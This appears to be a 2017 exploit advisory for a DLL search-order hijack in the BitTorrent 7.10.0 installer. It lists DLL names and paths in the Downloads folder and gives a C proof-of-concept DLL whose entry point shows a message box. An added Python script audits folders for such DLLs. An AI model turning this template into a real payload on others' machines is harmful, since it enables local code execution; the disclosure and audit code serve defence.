Bittorrent 7.10.0 (Build 43581) Installer DLL Hijacking
Source: https://thel3l.me  Author: Jayasimha  Published: 2017-08-01
# Exploit Title: Bittorrent 7.10.0 (Build 43581) Installer DLL Search Order Hijack - "WININET.dll", "DNSAPI.dll", others
# Date of Discovery: July 21 2017
# Exploit Author: Rithwik Jayasimha
# Author Homepage/Contact: https://thel3l.me
# Vendor Name: Bittorrent Inc.
# Vendor Homepage: https://www.bittorrent.com
# Software Link: http://download-new.utorrent.com/endpoint/bittorrent/os/windows/track/stable/
# Affected Versions: <=7.10.0.43581
# Tested on: Windows 10, 8.1 x64
# Category: local
# Vulnerability type: Local Privilege Escalation/Code Execution


# Description:


	Bittorrent versions <=7.10.0 Build 43581 automatically search for "WININET.dll", "DNSAPI.dll", "MSIMG32.dll", "CRYPTSP.dll", "bcrypt.dll" and "PHLPAPI.dll",
	among others, in the directory the installer was downloaded to.
	An attacker who can create files with these names in that directory can potentially have them loaded and run when the installer is executed
	(code execution, local privilege escalation).
			C:\Users\<username>\Downloads\WININET.dll
			C:\Users\<username>\Downloads\msls31.dll
			C:\Users\<username>\Downloads\USP10.dll
			C:\Users\<username>\Downloads\CRYPTSP.dll
			C:\Users\<username>\Downloads\bcrypt.dll
			C:\Users\<username>\Downloads\PHLPAPI.dll


# Proof Of Concept:
	1. Compile, place in vulnerable location and run bittorrent.exe

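		#include <windows.h>
		#define DllExport __declspec (dllexport)

		/* Declared before use so DllMain compiles without an implicit declaration. */
		int dll_hijack(void);

		/* Entry point the loader calls when the installer loads this DLL. */
		BOOL WINAPI  DllMain (
		            HINSTANCE hinstDLL,
		            DWORD     fdwReason,
		            LPVOID    lpvReserved)
		{
		  dll_hijack();
		  return 0;
		}

		/* Harmless marker: a message box showing that the DLL's code ran. */
		int dll_hijack(void)
		{
		  MessageBoxA(0, "Bittorrent 7.10.0.43581 DLL Hijacking PoC", "DLL Message", MB_OK);
		  return 0;
		}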

# Additional Notes, References and links:

# Disclosure Timeline:
    This issue was remedied in BitTorrent 7.10.0 For Windows (build 43917)
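
To check a download folder for the condition the Description covers, the following added example (not part of the original advisory or the vendor's code) lists files whose names match the DLLs named on this page and records their hashes for triage. The names `ADVISORY_DLL_NAMES` and `audit_directory` are hypothetical, and the default folder is an assumption.

```python
"""Audit a download directory for DLLs named like the ones this advisory lists."""
import hashlib
import sys
from pathlib import Path

# DLL names copied from the advisory text and its path list (spelled as on the page).
ADVISORY_DLL_NAMES = frozenset(n.lower() for n in (
    "WININET.dll", "DNSAPI.dll", "MSIMG32.dll", "CRYPTSP.dll",
    "bcrypt.dll", "PHLPAPI.dll", "msls31.dll", "USP10.dll",
))


def sha256_of(path):
    """Hash a file in chunks so large files are not read into memory at once."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def audit_directory(directory, names=ADVISORY_DLL_NAMES):
    """Return one finding per top-level file whose name matches a listed DLL.

    Matching is case-insensitive because Windows file names are.
    """
    entries = [p for p in Path(directory).iterdir() if p.is_file()]
    # Executables in the same folder are the programs that could load the DLL.
    executables = sorted(p.name for p in entries if p.suffix.lower() == ".exe")
    findings = []
    for path in sorted(entries, key=lambda p: p.name.lower()):
        if path.name.lower() in names:
            findings.append({
                "name": path.name,
                "size": path.stat().st_size,
                "sha256": sha256_of(path),
                "exposed_executables": executables,
            })
    return findings


if __name__ == "__main__":
    # Assumed default: the current user's Downloads folder.
    target = sys.argv[1] if len(sys.argv) > 1 else Path.home() / "Downloads"
    for item in audit_directory(target):
        print(f"{item['name']}  {item['size']} bytes  sha256={item['sha256']}")
        print(f"  executables in same folder: {item['exposed_executables'] or 'none'}")
```

A DLL with a system library's name has no normal reason to sit in a download folder, so any finding deserves a look before an installer is run from there.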
